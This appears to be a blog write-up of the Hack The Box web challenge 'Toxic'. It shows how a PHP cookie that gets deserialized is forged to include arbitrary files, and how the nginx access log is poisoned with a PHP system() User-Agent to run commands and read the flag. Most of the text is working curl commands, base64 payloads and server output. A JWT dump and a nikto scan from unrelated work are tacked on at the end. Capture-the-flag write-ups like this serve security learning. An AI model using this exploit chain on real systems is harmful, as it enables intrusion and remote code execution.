Toxic

Challenges Hack The Box Web No Comments
Check the code first.
index.php
<?php
spl_autoload_register(function ($name){
    if (preg_match('/Model$/', $name))
    {
        $name = "models/${name}";
    }
    include_once "${name}.php";
});

if (empty($_COOKIE['PHPSESSID']))
{
    $page = new PageModel;
    $page->file = '/www/index.html';

    setcookie(
        'PHPSESSID', //name
        base64_encode(serialize($page)), //value
        time()+60*60*24, //expire day
        '/' //"/" means that the cookie is available in entire website 
    );
} 

$cookie = base64_decode($_COOKIE['PHPSESSID']);
unserialize($cookie); 

models/PageModel.php 
<?php
class PageModel
{
    public $file;

    public function __destruct() 
    {
        include($this->file);
    }
}

We can see that phpsessid cookie is deserialised and the file to load on the screen is fetched from the deserialised object.

PHPSESSID:"Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9"

kali@kali:~/0.htb/challenges/Web/Toxic$ echo Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9| base64 -d
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

We can modify the object and read files from the server but we can't read the flag file because we don't know its name. So we try to poison the server logs.

kali@kali:~/0.htb/challenges/Web/Toxic$ echo 'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
kali@kali:~/0.htb/challenges/Web/Toxic$ 

We send this new cookie to the server and we can read the log file.

GET / HTTP/1.1
Host: 127.0.0.1:1337
User-Agent: <?php system('ls /');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

curl -H "Host: example.com" http://localhost/
curl -A "user-agent-name-here" [URL]
curl --user-agent 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' example.com
curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/

kali@kali:~/0.htb/challenges/Web/Toxic$ curl -H "127.0.0.1:1337" --user-agent "<?php system('ls /');?>" --cookie "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=" http://159.65.25.26:30559 -v
*   Trying 159.65.25.26:30559...
* Connected to 159.65.25.26 (159.65.25.26) port 30559 (#0)
> GET / HTTP/1.1
> Host: 159.65.25.26:30559
> User-Agent: <?php system('ls /');?>
> Accept: */*
> Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
> 127.0.0.1:1337
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx
< Date: Wed, 05 May 2021 18:06:53 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/7.4.15
< 
159.65.25.26 - 200 "GET / HTTP/1.1" "-" "curl/7.74.0" 
159.65.25.26 - 200 "GET / HTTP/1.1" "-" "curl/7.74.0" 
159.65.25.26 - 200 "GET / HTTP/1.1" "-" "bin
dev
entrypoint.sh
etc
flag_cDLYe
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
www
" 
* Connection #0 to host 159.65.25.26 left intact
kali@kali:~/0.htb/challenges/Web/Toxic$ 

kali@kali:~/0.htb/challenges/Web/Toxic$ echo 'O:9:"PageModel":1:{s:4:"file";s:11:"/flag_cDLYe";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K

curl --cookie "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K" http://159.65.25.26:30559 -v

kali@kali:~/0.htb/challenges/Web/Toxic$ curl --cookie "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K" http://159.65.25.26:30559 -v
*   Trying 159.65.25.26:30559...
* Connected to 159.65.25.26 (159.65.25.26) port 30559 (#0)
> GET / HTTP/1.1
> Host: 159.65.25.26:30559
> User-Agent: curl/7.74.0
> Accept: */*
> Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx
< Date: Wed, 05 May 2021 18:23:44 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/7.4.15
< 
HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}
* Connection #0 to host 159.65.25.26 left intact
kali@kali:~/0.htb/challenges/Web/Toxic$ 








session:"eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJwayI6Ii0tLS0tQkVHSU4gUFVCTElDIEtFWS0tLS0tXG5NSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTk1b1RtOUROemNIcjhnTGhqWmFZXG5rdHNiajFLeHhVT296dzB0clA5M0JnSXBYdjZXaXBRUkI1bHFvZlBsVTZGQjk5SmM1UVowNDU5dDczZ2dWRFFpXG5YdUNNSTJob1VmSjFWbWpOZVdDclNyRFVob2tJRlpFdUN1bWVod3d0VU51RXYwZXpDNTRaVGRFQzVZU1RBT3pnXG5qSVdhbHNIai9nYTVaRUR4M0V4dDBNaDVBRXdiQUQ3MytxWFMvdUN2aGZhamdwekhHZDlPZ05RVTYwTE1mMm1IXG4rRnluTnNqTk53bzVuUmU3dFIxMldiMllPQ3h3MnZkYW1PMW4xa2YvU015cFNLS3ZPZ2o1eTBMR2lVM2plWE14XG5WOFdTK1lpWUNVNU9CQW1UY3oydzJrekJoWkZsSDZSSzRtcXVleEpIcmEyM0lHdjVVSjVHVlBFWHBkQ3FLM1RyXG4wd0lEQVFBQlxuLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tXG4iLCJpYXQiOjE2MTg1Mjk2MTN9.otJkE-Vp86gTIefNu_tEY7dMDMXFL8pmOv9pq__bUklOAl7bo47VtgpSrbHShvP_cKdnjZbxsw39mu73yUPTzFfIRn3roetZb5kzmUTrM0XO5T3QBMGF6k01c3fEmM7Azh78_BD20LNbzefRUL3v3TBFPqtJR3DfSR3MyUsavnjN9UgewY4tmFbLX248B7g37I4THf0ey1CkHJxL0jxW4B7eYXCPtnGLuiZvfwGd5_EYdCJfcEr0678n9J_YmEXNDwzt6YEwaf4zJ0II8PQsi2uU95O4NtFBDYPbUYf4sHkSsz87Bxcmw52p9r-fQLPZBMM0BzJ2LZqdh46VsTIdgA"
{
  "alg": "RS256",
  "typ": "JWT"
}
{
  "username": "test",
  "pk": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n",
  "iat": 1618529613
}










kali@kali:~/0.htb/challenges/Web/Toxic$ nikto -h http://138.68.182.108:30734
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          138.68.182.108
+ Target Hostname:    138.68.182.108
+ Target Port:        30734
+ Start Time:         2021-05-05 08:19:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.4.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /js: This might be interesting...
+ 7923 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-05-05 08:32:42 (GMT-4) (812 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~/0.htb/challenges/Web/Toxic$

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation